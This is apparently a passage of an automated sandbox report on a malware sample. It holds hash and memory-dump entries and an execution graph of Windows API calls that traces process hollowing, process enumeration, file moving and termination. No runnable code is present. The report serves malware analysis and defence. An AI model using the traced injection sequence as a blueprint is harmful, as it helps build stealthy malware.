                                                                        • Opcode Fuzzy Hash: 5c1edfd9e65042951f7138fc992575df045ffbe94245221e5f97b82a9add3eb3
                                                                        • Instruction Fuzzy Hash: D001D6B1504240AFE720DB05DD8CBA6F7E8DF44724F148096EE058B791D778E848CBB6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • ShellExecuteExW.SHELL32(?), ref: 00B8B360
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: ExecuteShell
                                                                        • String ID:
                                                                        • API String ID: 587946157-0
                                                                        • Opcode ID: 8c6bdba325cb866d04d4d1da492263e35a647c6a0185b4b49bfc2c21027d881a
                                                                        • Instruction ID: fe283bcb806f268bd370ec5a0cb81eebbf402bb2ac397e34614aeaa0146f5e42
                                                                        • Opcode Fuzzy Hash: 8c6bdba325cb866d04d4d1da492263e35a647c6a0185b4b49bfc2c21027d881a
                                                                        • Instruction Fuzzy Hash: 3C014C756002448FDB10DF66D989B66BBE8EF45320F08C4EADD09CB662D774E808DB65
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00B8A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
                                                                        • API String ID: 2591292051-0
                                                                        • Opcode ID: 07533ea67cb8ae4e551eb712461fb543241d37f1cce8e0919aab0cedf1d080df
                                                                        • Instruction ID: 728b778a114feaf04d38f5d3a333ea49acf9cba1aa035fdc73d7b0868dfd0f55
                                                                        • Opcode Fuzzy Hash: 07533ea67cb8ae4e551eb712461fb543241d37f1cce8e0919aab0cedf1d080df
                                                                        • Instruction Fuzzy Hash: B101DF715046408FEB10DF15DA88752FBE4EF00324F08C4EBDD0A8BB56D274E808CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(?), ref: 00B8A330
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424215161.0000000000B8A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b8a000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 4211ea4be0b586c10d9e9131863af7737343ca55a50f8ff6e2b090dedda3fb18
                                                                        • Instruction ID: dbaf90fd4ee66bf188184db1ebc4fe3206899cdc0074249b7b2ec1c68037130c
                                                                        • Opcode Fuzzy Hash: 4211ea4be0b586c10d9e9131863af7737343ca55a50f8ff6e2b090dedda3fb18
                                                                        • Instruction Fuzzy Hash: 86F08C359042408FEB109F0AD988761FBE4EF04320F08C0DADD494B762D2B9E808DBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 21e92da0f053ad079c27ad8d2d76e1cb776b1c638961c353e8c57980667e0bd8
                                                                        • Instruction ID: 4123c142fe0b0d53aa6a4a5800e7ab4a03cbe6403ce96bc8199ffbb534c396d2
                                                                        • Opcode Fuzzy Hash: 21e92da0f053ad079c27ad8d2d76e1cb776b1c638961c353e8c57980667e0bd8
                                                                        • Instruction Fuzzy Hash: F6411C302072468BC704FB7AE7895CA77F2AB8530C7508829D4449FF6EDF78594ACB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 774806ab702e299a12222d9daacec8b3f9ab9a36a65af45e37d9a81cdd4815d6
                                                                        • Instruction ID: a87dcf08248f814863da6fded64e50cd54f1e40b641a604fdcaa5b5be12495e7
                                                                        • Opcode Fuzzy Hash: 774806ab702e299a12222d9daacec8b3f9ab9a36a65af45e37d9a81cdd4815d6
                                                                        • Instruction Fuzzy Hash: A701B5726093804FC3173B3894245793BA69BC220974A40FED1418B3E2DB795D0AC3A5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1428220836.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_4d30000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 351a87180d37b89cc5d6e5f9d3779504bfa826e3fcd86d7c8ba027d5643685ee
                                                                        • Instruction ID: 37d64af59f1bf70755080a6a01f80a45cf0059e2b6f1cbcd34a8dffa0f87ec81
                                                                        • Opcode Fuzzy Hash: 351a87180d37b89cc5d6e5f9d3779504bfa826e3fcd86d7c8ba027d5643685ee
                                                                        • Instruction Fuzzy Hash: 8701019AA4FBC05FD70302302CA56902F70AEA3109B9E04EBD485CA1A3E40E0A1F9722
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1423968663.0000000000B00000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b00000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b15440ce3af0290539df204d2756825de02ee9e57fc5ab32fe9835e34e3ed871
                                                                        • Instruction ID: 5761474731dca0ce2805742e810929b21595cf5a9964a8e52ab83342dc551a90
                                                                        • Opcode Fuzzy Hash: b15440ce3af0290539df204d2756825de02ee9e57fc5ab32fe9835e34e3ed871
                                                                        • Instruction Fuzzy Hash: A3018BB55097806FDB118F159D44863FFE8EF86620709C4AFED4987752D2256904CBB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1423968663.0000000000B00000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b00000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c41e2fc89c9ed172b3480df71fc0f1572935e27d9ce55f9facafac0f4ad35663
                                                                        • Instruction ID: a67d16be081cbab2c47d58c5f9e788e32475b7c412cc2136f16c6424431bdfc2
                                                                        • Opcode Fuzzy Hash: c41e2fc89c9ed172b3480df71fc0f1572935e27d9ce55f9facafac0f4ad35663
                                                                        • Instruction Fuzzy Hash: 77E092B66046044B9650CF0AED45452F7D8EB84630B08C07FDC0E8B701D67AB508CAA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424128400.0000000000B82000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B82000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b82000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 54547b0a5bd6f2c20502af54de95d11dff9dca901ad07fbf340da70d874b5f9f
                                                                        • Instruction ID: 4ae35964c8b1eb2f874297b91a87e23556186025adb90678e18dd7947953229b
                                                                        • Opcode Fuzzy Hash: 54547b0a5bd6f2c20502af54de95d11dff9dca901ad07fbf340da70d874b5f9f
                                                                        • Instruction Fuzzy Hash: 1ED05E792056C14FD316AB1CD2A9F9537D4AB55714F4A44FAA8008B773C768D981D610
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1424128400.0000000000B82000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B82000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_b82000_iR2UtZj5vP.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 314142aab4d6d50ea450a3d7ce69626ad3bb1711fcc9f677e0d3394df61e7366
                                                                        • Instruction ID: d5a25674378652fcb9bcf5d1738b9cd6c3e99d9b944ddce4c88854e9ca8423fe
                                                                        • Opcode Fuzzy Hash: 314142aab4d6d50ea450a3d7ce69626ad3bb1711fcc9f677e0d3394df61e7366
                                                                        • Instruction Fuzzy Hash: 16D05E342002814FCB16EB1CD2E8F5937D4AB44714F0644E8BC108B772C7A8D9C0DA00
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:17.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:1147
                                                                        Total number of Limit Nodes:13
                                                                        execution_graph 2342 40a280 2355 405a10 2342->2355 2344 40a2a7 2345 405a10 104 API calls 2344->2345 2346 40a2b0 SendMessageA SendMessageA GetWindowRect 2345->2346 2482 4052c0 CopyRect 2346->2482 2348 40a30b _ftol 2349 40afbe 2348->2349 2350 40a342 GetWindowRect 2349->2350 2351 40a359 2350->2351 2483 405300 CopyRect 2351->2483 2354 40a38c 2554 40b0e0 2355->2554 2358 407516 LoadLibraryA 2360 407568 LoadLibraryA 2358->2360 2362 407652 LoadLibraryA 2360->2362 2363 40766b LoadLibraryA 2362->2363 2364 407681 LoadLibraryA 2363->2364 2365 407694 LoadLibraryA 2364->2365 2366 4076a4 LoadLibraryA 2365->2366 2367 4076ba LoadLibraryA 2366->2367 2368 4076ca LoadLibraryA 2367->2368 2369 4076da LoadLibraryA 2368->2369 2370 4076ea LoadLibraryA 2369->2370 2372 4077b1 LoadLibraryA 2370->2372 2373 4077c1 LoadLibraryA 2372->2373 2374 4077d1 LoadLibraryA 2373->2374 2375 4077e7 LoadLibraryA 2374->2375 2376 4077fd LoadLibraryA 2375->2376 2377 407813 LoadLibraryA 2376->2377 2378 407829 LoadLibraryA 2377->2378 2379 40783f LoadLibraryA 2378->2379 2380 40784f LoadLibraryA 2379->2380 2381 407865 LoadLibraryA 2380->2381 2382 40787b LoadLibraryA 2381->2382 2384 407a48 2382->2384 2385 407ad3 GetModuleFileNameW 2384->2385 2387 408afd 2384->2387 2395 408e4b 2384->2395 2386 407b09 wcscpy 2385->2386 2407 407b25 wcscpy wcscat wcscpy wcscat wcscat 2385->2407 2386->2407 2389 408c26 CreateFileW 2387->2389 2390 408cf7 2387->2390 2437 408b16 2387->2437 2389->2395 2398 408c78 CreateFileW 2389->2398 2392 408d00 CreateToolhelp32Snapshot 2390->2392 2401 408e47 2390->2401 2394 408d9c Process32First 2392->2394 2392->2395 2393 408158 CreateProcessW 2397 40818d Wow64GetThreadContext NtReadVirtualMemory NtUnmapViewOfSection NtUnmapViewOfSection 2393->2397 2443 408225 2393->2443 2408 408de6 Process32Next 2394->2408 2409 408e2d FindCloseChangeNotification 2394->2409 2395->2344 2399 4081f7 NtUnmapViewOfSection NtUnmapViewOfSection 2397->2399 2398->2395 2400 408c99 CreateFileW 2398->2400 2399->2443 2400->2395 2402 408cbc CreateFileW 2400->2402 2401->2395 2406 408f3a CreateFileA 2401->2406 2402->2395 2405 408cdd FindCloseChangeNotification 2402->2405 2404 408272 VirtualAllocEx 2404->2443 2411 408ce7 2405->2411 2406->2395 2410 408fc7 CreateFileA 2406->2410 2407->2393 2408->2409 2412 408df7 strstr 2408->2412 2409->2344 2410->2395 2414 408fe9 CreateFileW 2410->2414 2411->2344 2416 408e3a 2412->2416 2417 408e0b strstr 2412->2417 2413 4082d8 VirtualAllocEx WriteProcessMemory WriteProcessMemory 2413->2443 2427 40903b wcslen CreateFileW 2414->2427 2415 4082b6 VirtualAllocEx 2415->2443 2416->2344 2417->2416 2418 408e1f 2417->2418 2418->2409 2418->2412 2419 408327 WriteProcessMemory 2419->2419 2419->2443 2420 4083da WriteProcessMemory Wow64SetThreadContext GetPEB 2423 40844e WriteProcessMemory ResumeThread Wow64SuspendThread WriteProcessMemory 2420->2423 2420->2443 2422 40838c WriteProcessMemory 2422->2420 2422->2422 2423->2443 2424 4084c1 wcscpy wcscat MoveFileExW CopyFileW 2426 4087f8 ResumeThread 2424->2426 2424->2443 2425 4089af ResumeThread 2425->2443 2426->2443 2428 409077 wcscat CreateFileW 2427->2428 2433 409111 2428->2433 2434 40911a VirtualAlloc 2428->2434 2429 408a4d wcscat 2432 408a77 wcsstr 2429->2432 2431 408813 Sleep CreateToolhelp32Snapshot Module32First 2431->2443 2435 408a8f CreateFileW 2432->2435 2432->2443 2433->2434 2438 409148 ReadFile 2434->2438 2435->2443 2436 408900 Wow64SuspendThread 2436->2443 2437->2344 2447 40915c FindCloseChangeNotification 2438->2447 2439 4088c8 strstr 2441 40891b Wow64SuspendThread FindCloseChangeNotification DeleteFileW 2439->2441 2439->2443 2440 408945 ResumeThread Sleep DeleteFileW 2440->2443 2444 408977 Wow64SuspendThread 2440->2444 2441->2443 2442 408ad8 TerminateProcess 2442->2443 2443->2387 2443->2393 2443->2404 2443->2413 2443->2415 2443->2419 2443->2420 2443->2422 2443->2424 2443->2425 2443->2426 2443->2429 2443->2431 2443->2436 2443->2439 2443->2440 2443->2442 2445 408988 Sleep MoveFileExW 2443->2445 2444->2445 2445->2425 2445->2443 2449 4091c3 VirtualAlloc 2447->2449 2452 4092a3 2449->2452 2450 409b8a 2451 405a10 ExitProcess 2450->2451 2453 409bd6 2451->2453 2452->2450 2454 409409 2452->2454 2456 405a10 ExitProcess 2452->2456 2455 409be6 2453->2455 2459 405a10 ExitProcess 2453->2459 2457 409428 2454->2457 2458 405a10 ExitProcess 2454->2458 2460 409c07 2455->2460 2461 409c1e 2455->2461 2462 4093fd 2456->2462 2468 405a10 ExitProcess 2457->2468 2480 40949e 2457->2480 2467 40941c 2458->2467 2459->2455 2463 405a10 ExitProcess 2460->2463 2465 409c27 2461->2465 2466 409c3e 2461->2466 2462->2454 2464 409404 2462->2464 2473 409c12 2463->2473 2556 405a00 ExitProcess 2464->2556 2469 405a10 ExitProcess 2465->2469 2471 405a10 ExitProcess 2466->2471 2467->2457 2470 409423 2467->2470 2472 40945b 2468->2472 2475 409c32 2469->2475 2557 405a00 ExitProcess 2470->2557 2471->2395 2478 405a10 ExitProcess 2472->2478 2472->2480 2473->2344 2475->2344 2477 409a05 2477->2450 2479 405a10 ExitProcess 2477->2479 2478->2480 2479->2450 2480->2477 2481 40996b CreateProcessA Sleep TerminateProcess 2480->2481 2481->2477 2482->2348 2558 403e10 2483->2558 2485 405331 CopyRect 2486 403e10 7 API calls 2485->2486 2487 405351 CopyRect 2486->2487 2488 403e10 7 API calls 2487->2488 2489 405371 CopyRect 2488->2489 2490 403e10 7 API calls 2489->2490 2491 405391 CopyRect 2490->2491 2492 403e10 7 API calls 2491->2492 2493 4053b1 CopyRect 2492->2493 2494 403e10 7 API calls 2493->2494 2495 4053d1 CopyRect 2494->2495 2496 403e10 7 API calls 2495->2496 2497 4053f1 CopyRect 2496->2497 2498 403e10 7 API calls 2497->2498 2499 405411 CopyRect 2498->2499 2500 403e10 7 API calls 2499->2500 2501 405431 CopyRect 2500->2501 2502 403e10 7 API calls 2501->2502 2503 405451 CopyRect 2502->2503 2504 403e10 7 API calls 2503->2504 2505 405471 CopyRect 2504->2505 2506 403e10 7 API calls 2505->2506 2507 405491 CopyRect 2506->2507 2508 403e10 7 API calls 2507->2508 2509 4054b1 CopyRect 2508->2509 2510 403e10 7 API calls 2509->2510 2511 4054d1 CopyRect 2510->2511 2512 403e10 7 API calls 2511->2512 2513 4054f1 CopyRect 2512->2513 2514 403e10 7 API calls 2513->2514 2515 405511 CopyRect 2514->2515 2516 403e10 7 API calls 2515->2516 2517 405531 CopyRect 2516->2517 2518 403e10 7 API calls 2517->2518 2519 405551 CopyRect 2518->2519 2520 403e10 7 API calls 2519->2520 2521 405571 CopyRect 2520->2521 2522 403e10 7 API calls 2521->2522 2523 405591 CopyRect 2522->2523 2524 403e10 7 API calls 2523->2524 2525 4055b1 CopyRect 2524->2525 2526 403e10 7 API calls 2525->2526 2527 4055d1 CopyRect 2526->2527 2528 403e10 7 API calls 2527->2528 2529 4055f1 CopyRect 2528->2529 2530 403e10 7 API calls 2529->2530 2531 405611 CopyRect 2530->2531 2532 403e10 7 API calls 2531->2532 2533 405631 CopyRect 2532->2533 2534 403e10 7 API calls 2533->2534 2535 405651 CopyRect 2534->2535 2536 403e10 7 API calls 2535->2536 2537 405671 CopyRect 2536->2537 2538 403e10 7 API calls 2537->2538 2539 405691 CopyRect 2538->2539 2540 403e10 7 API calls 2539->2540 2541 4056b1 CopyRect 2540->2541 2542 403e10 7 API calls 2541->2542 2543 4056d1 CopyRect 2542->2543 2544 403e10 7 API calls 2543->2544 2545 4056f1 CopyRect 2544->2545 2546 403e10 7 API calls 2545->2546 2547 405711 CopyRect 2546->2547 2548 403e10 7 API calls 2547->2548 2549 405731 CopyRect 2548->2549 2550 403e10 7 API calls 2549->2550 2551 405751 CopyRect 2550->2551 2552 403e10 7 API calls 2551->2552 2553 405771 SetWindowRgn 2552->2553 2553->2354 2555 405a1d LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 2554->2555 2555->2358 2562 403e3a 2558->2562 2559 403fcd 2560 40404a CreatePolygonRgn 2559->2560 2561 403fdf CreatePolygonRgn 2559->2561 2568 404058 2560->2568 2563 403fef 2561->2563 2562->2559 2564 403f74 _ftol _ftol 2562->2564 2565 403ffa CombineRgn CreatePolygonRgn 2563->2565 2564->2559 2564->2564 2566 40ae02 2565->2566 2567 40401e CombineRgn 2566->2567 2567->2568 2568->2485 2954 40aac0 GetClientRect 2958 404ec0 CopyRect 2954->2958 2956 40ab29 LoadCursorA SetCursor 2957 40aae6 2957->2956 3037 403c20 2958->3037 2960 404ef1 2961 404f06 CopyRect 2960->2961 2962 404ef8 2960->2962 2963 403c20 4 API calls 2961->2963 2962->2957 2964 404f23 2963->2964 2965 404f38 CopyRect 2964->2965 2966 404f2a 2964->2966 2967 403c20 4 API calls 2965->2967 2966->2957 2968 404f55 2967->2968 2969 404f6a CopyRect 2968->2969 2970 404f5c 2968->2970 2971 403c20 4 API calls 2969->2971 2970->2957 2972 404f87 2971->2972 2973 404f9c CopyRect 2972->2973 2974 404f8e 2972->2974 2975 403c20 4 API calls 2973->2975 2974->2957 2976 404fb9 2975->2976 2977 404fc0 2976->2977 2978 404fce CopyRect 2976->2978 2977->2957 2979 403c20 4 API calls 2978->2979 2980 404feb 2979->2980 2981 405000 CopyRect 2980->2981 2982 404ff2 2980->2982 2983 403c20 4 API calls 2981->2983 2982->2957 2984 40501d 2983->2984 2985 405032 CopyRect 2984->2985 2986 405024 2984->2986 2987 403c20 4 API calls 2985->2987 2986->2957 2988 40504f 2987->2988 2989 405064 CopyRect 2988->2989 2990 405056 2988->2990 2991 403c20 4 API calls 2989->2991 2990->2957 2992 405081 2991->2992 2993 405096 CopyRect 2992->2993 2994 405088 2992->2994 2995 403c20 4 API calls 2993->2995 2994->2957 2996 4050b3 2995->2996 2997 4050c8 CopyRect 2996->2997 2998 4050ba 2996->2998 2999 403c20 4 API calls 2997->2999 2998->2957 3000 4050e5 2999->3000 3001 4050fa CopyRect 3000->3001 3002 4050ec 3000->3002 3003 403c20 4 API calls 3001->3003 3002->2957 3004 405117 3003->3004 3005 40512c CopyRect 3004->3005 3006 40511e 3004->3006 3007 403c20 4 API calls 3005->3007 3006->2957 3008 405149 3007->3008 3009 405150 3008->3009 3010 40515e CopyRect 3008->3010 3009->2957 3011 403c20 4 API calls 3010->3011 3012 40517b 3011->3012 3013 405190 CopyRect 3012->3013 3014 405182 3012->3014 3015 403c20 4 API calls 3013->3015 3014->2957 3016 4051ad 3015->3016 3017 4051c2 CopyRect 3016->3017 3018 4051b4 3016->3018 3019 403c20 4 API calls 3017->3019 3018->2957 3020 4051df 3019->3020 3021 4051f4 CopyRect 3020->3021 3022 4051e6 3020->3022 3023 403c20 4 API calls 3021->3023 3022->2957 3024 405211 3023->3024 3025 405226 CopyRect 3024->3025 3026 405218 3024->3026 3027 403c20 4 API calls 3025->3027 3026->2957 3028 405243 3027->3028 3029 405258 CopyRect 3028->3029 3030 40524a 3028->3030 3031 403c20 4 API calls 3029->3031 3030->2957 3032 405275 3031->3032 3033 40528a CopyRect 3032->3033 3034 40527c 3032->3034 3035 403c20 4 API calls 3033->3035 3034->2957 3036 4052a7 3035->3036 3036->2957 3039 403d04 3037->3039 3038 403d94 CreatePolygonRgn 3040 403dad 3038->3040 3039->3038 3041 403d37 _ftol _ftol 3039->3041 3042 403db1 PtInRegion 3040->3042 3044 403dca 3040->3044 3041->3041 3043 403d90 3041->3043 3042->3044 3043->3038 3044->2960 3053 40ac80 ExtTextOutA 3054 409c80 3063 401000 CopyRect 3054->3063 3056 409cf3 _ftol _ftol _ftol 3057 40afbe 3056->3057 3058 409d7d GetWindowRect 3057->3058 3059 409d98 3058->3059 3064 402500 CopyRect 3059->3064 3062 409dd5 3063->3056 3065 403e10 7 API calls 3064->3065 3066 402531 CopyRect 3065->3066 3395 404850 3066->3395 3068 402551 CopyRect 3069 403e10 7 API calls 3068->3069 3070 402571 CopyRect 3069->3070 3396 404850 3070->3396 3072 402591 CopyRect 3073 403e10 7 API calls 3072->3073 3074 4025b1 CopyRect 3073->3074 3397 404850 3074->3397 3076 4025d1 CopyRect 3077 403e10 7 API calls 3076->3077 3078 4025f1 CopyRect 3077->3078 3398 404850 3078->3398 3080 402611 CopyRect 3081 403e10 7 API calls 3080->3081 3082 402631 CopyRect 3081->3082 3399 404850 3082->3399 3084 402651 CopyRect 3085 403e10 7 API calls 3084->3085 3086 402671 CopyRect 3085->3086 3400 404850 3086->3400 3088 402691 CopyRect 3089 403e10 7 API calls 3088->3089 3090 4026b1 CopyRect 3089->3090 3401 404850 3090->3401 3092 4026d1 CopyRect 3093 403e10 7 API calls 3092->3093 3094 4026f1 CopyRect 3093->3094 3402 404850 3094->3402 3096 402711 CopyRect 3097 403e10 7 API calls 3096->3097 3098 402731 CopyRect 3097->3098 3403 404850 3098->3403 3100 402751 CopyRect 3101 403e10 7 API calls 3100->3101 3102 402771 CopyRect 3101->3102 3404 404850 3102->3404 3104 402791 CopyRect 3105 403e10 7 API calls 3104->3105 3106 4027b1 CopyRect 3105->3106 3405 404850 3106->3405 3108 4027d1 CopyRect 3109 403e10 7 API calls 3108->3109 3110 4027f1 CopyRect 3109->3110 3406 404850 3110->3406 3112 402811 CopyRect 3113 403e10 7 API calls 3112->3113 3114 402831 CopyRect 3113->3114 3407 404850 3114->3407 3116 402851 CopyRect 3117 403e10 7 API calls 3116->3117 3118 402871 CopyRect 3117->3118 3408 404850 3118->3408 3120 402891 CopyRect 3121 403e10 7 API calls 3120->3121 3122 4028b1 CopyRect 3121->3122 3409 404850 3122->3409 3124 4028d1 CopyRect 3125 403e10 7 API calls 3124->3125 3126 4028f1 CopyRect 3125->3126 3410 404850 3126->3410 3128 402911 CopyRect 3129 403e10 7 API calls 3128->3129 3130 402931 CopyRect 3129->3130 3411 404850 3130->3411 3132 402951 CopyRect 3133 403e10 7 API calls 3132->3133 3134 402971 CopyRect 3133->3134 3412 404850 3134->3412 3136 402991 CopyRect 3137 403e10 7 API calls 3136->3137 3138 4029b1 CopyRect 3137->3138 3413 404850 3138->3413 3140 4029d1 CopyRect 3141 403e10 7 API calls 3140->3141 3142 4029f1 CopyRect 3141->3142 3414 404850 3142->3414 3144 402a11 CopyRect 3145 403e10 7 API calls 3144->3145 3146 402a31 CopyRect 3145->3146 3415 404850 3146->3415 3148 402a51 CopyRect 3149 403e10 7 API calls 3148->3149 3150 402a71 CopyRect 3149->3150 3416 404850 3150->3416 3152 402a91 CopyRect 3153 403e10 7 API calls 3152->3153 3154 402ab1 CopyRect 3153->3154 3417 404850 3154->3417 3156 402ad1 CopyRect 3157 403e10 7 API calls 3156->3157 3158 402af1 CopyRect 3157->3158 3418 404850 3158->3418 3160 402b11 CopyRect 3161 403e10 7 API calls 3160->3161 3162 402b31 CopyRect 3161->3162 3419 404850 3162->3419 3164 402b51 CopyRect 3165 403e10 7 API calls 3164->3165 3166 402b71 CopyRect 3165->3166 3420 404850 3166->3420 3168 402b91 CopyRect 3169 403e10 7 API calls 3168->3169 3170 402bb1 CopyRect 3169->3170 3421 404850 3170->3421 3172 402bd1 CopyRect 3173 403e10 7 API calls 3172->3173 3174 402bf1 CopyRect 3173->3174 3422 404850 3174->3422 3176 402c11 CopyRect 3177 403e10 7 API calls 3176->3177 3178 402c31 CopyRect 3177->3178 3423 404850 3178->3423 3180 402c51 CopyRect 3181 403e10 7 API calls 3180->3181 3182 402c71 CopyRect 3181->3182 3424 404850 3182->3424 3184 402c91 CopyRect 3185 403e10 7 API calls 3184->3185 3186 402cb1 CopyRect 3185->3186 3425 404850 3186->3425 3188 402cd1 CopyRect 3189 403e10 7 API calls 3188->3189 3190 402cf1 CopyRect 3189->3190 3426 404850 3190->3426 3192 402d11 CopyRect 3193 403e10 7 API calls 3192->3193 3194 402d31 CopyRect 3193->3194 3427 404850 3194->3427 3196 402d51 CopyRect 3197 403e10 7 API calls 3196->3197 3198 402d71 CopyRect 3197->3198 3428 404850 3198->3428 3200 402d91 CopyRect 3201 403e10 7 API calls 3200->3201 3202 402db1 CopyRect 3201->3202 3429 404850 3202->3429 3204 402dd1 CopyRect 3205 403e10 7 API calls 3204->3205 3206 402df1 CopyRect 3205->3206 3430 404850 3206->3430 3208 402e11 CopyRect 3209 403e10 7 API calls 3208->3209 3210 402e31 CopyRect 3209->3210 3431 404850 3210->3431 3212 402e51 CopyRect 3213 403e10 7 API calls 3212->3213 3214 402e71 CopyRect 3213->3214 3432 404850 3214->3432 3216 402e91 CopyRect 3217 403e10 7 API calls 3216->3217 3218 402eb1 CopyRect 3217->3218 3433 404850 3218->3433 3220 402ed1 CopyRect 3221 403e10 7 API calls 3220->3221 3222 402ef1 CopyRect 3221->3222 3434 404850 3222->3434 3224 402f11 CopyRect 3225 403e10 7 API calls 3224->3225 3226 402f31 CopyRect 3225->3226 3435 404850 3226->3435 3228 402f51 CopyRect 3229 403e10 7 API calls 3228->3229 3230 402f71 CopyRect 3229->3230 3436 404850 3230->3436 3232 402f91 CopyRect 3233 403e10 7 API calls 3232->3233 3234 402fb1 CopyRect 3233->3234 3437 404850 3234->3437 3236 402fd1 CopyRect 3237 403e10 7 API calls 3236->3237 3238 402ff1 CopyRect 3237->3238 3438 404850 3238->3438 3240 403011 CopyRect 3241 403e10 7 API calls 3240->3241 3242 403031 CopyRect 3241->3242 3439 404850 3242->3439 3244 403051 CopyRect 3245 403e10 7 API calls 3244->3245 3246 403071 CopyRect 3245->3246 3440 404850 3246->3440 3248 403091 CopyRect 3249 403e10 7 API calls 3248->3249 3250 4030b1 CopyRect 3249->3250 3441 404850 3250->3441 3252 4030d1 CopyRect 3253 403e10 7 API calls 3252->3253 3254 4030f1 CopyRect 3253->3254 3442 404850 3254->3442 3256 403111 CopyRect 3257 403e10 7 API calls 3256->3257 3258 403131 CopyRect 3257->3258 3443 404850 3258->3443 3260 403151 CopyRect 3261 403e10 7 API calls 3260->3261 3262 403171 CopyRect 3261->3262 3444 404850 3262->3444 3264 403191 CopyRect 3265 403e10 7 API calls 3264->3265 3266 4031b1 CopyRect 3265->3266 3445 404850 3266->3445 3268 4031d1 CopyRect 3269 403e10 7 API calls 3268->3269 3270 4031f1 CopyRect 3269->3270 3446 404850 3270->3446 3272 403211 CopyRect 3273 403e10 7 API calls 3272->3273 3274 403231 CopyRect 3273->3274 3447 404850 3274->3447 3276 403251 CopyRect 3277 403e10 7 API calls 3276->3277 3278 403271 CopyRect 3277->3278 3448 404850 3278->3448 3280 403291 CopyRect 3281 403e10 7 API calls 3280->3281 3282 4032b1 CopyRect 3281->3282 3449 404850 3282->3449 3284 4032d1 CopyRect 3285 403e10 7 API calls 3284->3285 3286 4032f1 CopyRect 3285->3286 3450 404850 3286->3450 3288 403311 CopyRect 3289 403e10 7 API calls 3288->3289 3290 403331 CopyRect 3289->3290 3451 404850 3290->3451 3292 403351 CopyRect 3293 403e10 7 API calls 3292->3293 3294 403371 CopyRect 3293->3294 3452 404850 3294->3452 3296 403391 CopyRect 3297 403e10 7 API calls 3296->3297 3298 4033b1 